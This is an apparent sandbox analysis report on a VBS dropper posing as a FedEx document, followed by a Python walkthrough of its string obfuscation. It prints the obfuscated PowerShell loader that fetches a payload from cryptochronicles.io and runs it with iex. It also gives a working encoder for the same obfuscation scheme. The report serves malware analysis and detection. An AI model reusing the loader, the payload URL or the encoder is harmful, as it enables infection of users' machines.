Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: cryptochronicles.io |
Virustotal: Detection: 9% |
Source: http://cryptochronicles.io |
Virustotal: Detection: 9% |
Source: http://cryptochronicles.io/mgbo1/Noninstrumentally.qxd |
Virustotal: Detection: 9% |
Source: CR-FEDEX_TN-775537409198_Doc.vbs |
Virustotal: Detection: 28% |
Source: CR-FEDEX_TN-775537409198_Doc.vbs |
ReversingLabs: Detection: 18% |
Source: |
Binary string: ore.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbJS source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbGE source: powershell.exe, 00000008.00000002.2518113345.000002106CD64000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb[ source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE60000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.Automation.pdbR source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdllh source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ore.pdbk source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.pdb source: powershell.exe, 00000008.00000002.2518113345.000002106CD64000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cryptochronicles.ioConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: unknown |
DNS traffic detected: queries for: google.com |
Source: powershell.exe, 00000008.00000002.2491936262.0000021001A51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://cryptochronicles.io |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://cryptochronicles.io/mgbo1/Noninstrumentally.qxdP |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000477000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://cryptochronicles.io0 |
Source: wscript.exe, 00000000.00000003.1215958452.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1216836950.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215790449.00000284130A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000000.00000003.1215958452.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1216836950.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215790449.00000284130A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/- |
Source: wscript.exe, 00000000.00000003.1236757544.0000028411140000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237590407.000002841115D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000003.1236757544.0000028411140000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236757544.00000284111A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237590407.000002841115D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237590407.00000284111A2000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.1217504358.0000028413041000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4de1b9362c074 |
Source: wscript.exe, 00000000.00000003.1217146005.00000284111AE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4de1b9362c |
Source: powershell.exe, 00000008.00000002.2514971891.00000210101AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000008.00000002.2514971891.00000210101AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6388 |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. 
KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi |
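The command line above carries its own string decoder: `Tabellariske` walks a literal from index 5 in steps of 6 and keeps one character per step, so five junk characters hide every real one, and the loop bound `Length - 1` silently drops the payload of the last chunk (which is why every literal ends with a chunk whose payload is a space). The `$Parkin` literal decodes to `iex`, so `Gdedes` is a thin wrapper around Invoke-Expression. The Python below is an added analysis helper, not part of the sample or the sandbox report: `tabellariske` re-implements the decoder, `encode` is a hypothetical inverse used only to demonstrate the off-by-one, and `decode_assignments` pulls every `$Name=Tabellariske '...'` assignment out of a script. The sample script is constructed here from four literals copied verbatim from the command line above (`$Tempestuous`, `$Volow159`, `$Baandvv`, `$Parkin`); `$Volow159` is split across several Python lines purely for width, since the page's line break inside it is an extraction artifact. The decoded `$Tempestuous` and `$Volow159` values are the User-Agent header name and the URL seen in the HTTP rows above.

```python
import re

# Parameters of the obfuscation used by the dropper's PowerShell stage
# (function Tabellariske in the command line): start at index 5, step 6,
# stop while i < Length - 1. Only every sixth character is real.
START = 5
STRIDE = 6


def tabellariske(s: str) -> str:
    """Python re-implementation of the script's Tabellariske decoder.

    The loop runs while i < Length - 1, so the payload character of the
    final 6-byte chunk is never emitted. The script pads every literal with
    one trailing chunk whose payload is a space, which is the dropped char.
    """
    limit = len(s) - 1
    return "".join(s[i] for i in range(START, limit, STRIDE))


def encode(payload: str, filler: str = "LoremIpsumDolorSitAmet") -> str:
    """Hypothetical inverse transform (not in the sample): five filler chars
    before every payload char, plus one sacrificial trailing chunk so the
    decoder's off-by-one does not eat the last real character."""
    out = []
    k = 0
    for ch in payload + " ":
        for _ in range(STRIDE - 1):
            out.append(filler[k % len(filler)])
            k += 1
        out.append(ch)
    return "".join(out)


# Matches "$Name=Tabellariske '<literal>'". Assumption: literals contain no
# single quote, which holds for every literal visible in the command line.
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*Tabellariske\s+'([^']*)'")


def decode_assignments(script: str) -> dict:
    """Return {variable: decoded string} for every obfuscated assignment."""
    return {name: tabellariske(lit) for name, lit in ASSIGN_RE.findall(script)}


# Constructed sample: four assignments copied from the command line above.
# $Volow159 is wrapped here only for line width; it is one literal in the
# source (the page's line break falls between "Blaaj. " and "Keypq").
VOLOW159 = (
    "cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddy"
    "KidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axic"
    "Forudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xb"
    "F.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdrat"
    "ArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniy"
    "Blaaj. KeypqQuarrxVelgrd,adde "
)
SAMPLE_SCRIPT = (
    "$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';"
    "$Volow159=Tabellariske '" + VOLOW159 + "';"
    "$Baandvv=Tabellariske 'Dolme>Skots ';"
    "$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';"
)


if __name__ == "__main__":
    for name, value in decode_assignments(SAMPLE_SCRIPT).items():
        print(f"{name:<14} -> {value!r}")
    # Round trip through the hypothetical encoder; the sacrificial chunk is
    # what keeps the last character of the payload alive.
    assert tabellariske(encode("Mozilla/5.0")) == "Mozilla/5.0"
```

Running the block prints `User-Agent`, the `cryptochronicles.io/mgbo1/Noninstrumentally.qxd` URL, `>` and `iex`, which ties the obfuscated literals directly to the GET requests logged above. Literals whose doubled spaces were collapsed during extraction of this page (for example `$Frieri`) will decode with shifted characters if copied from the page text; decode them from the original script, not from the rendered report.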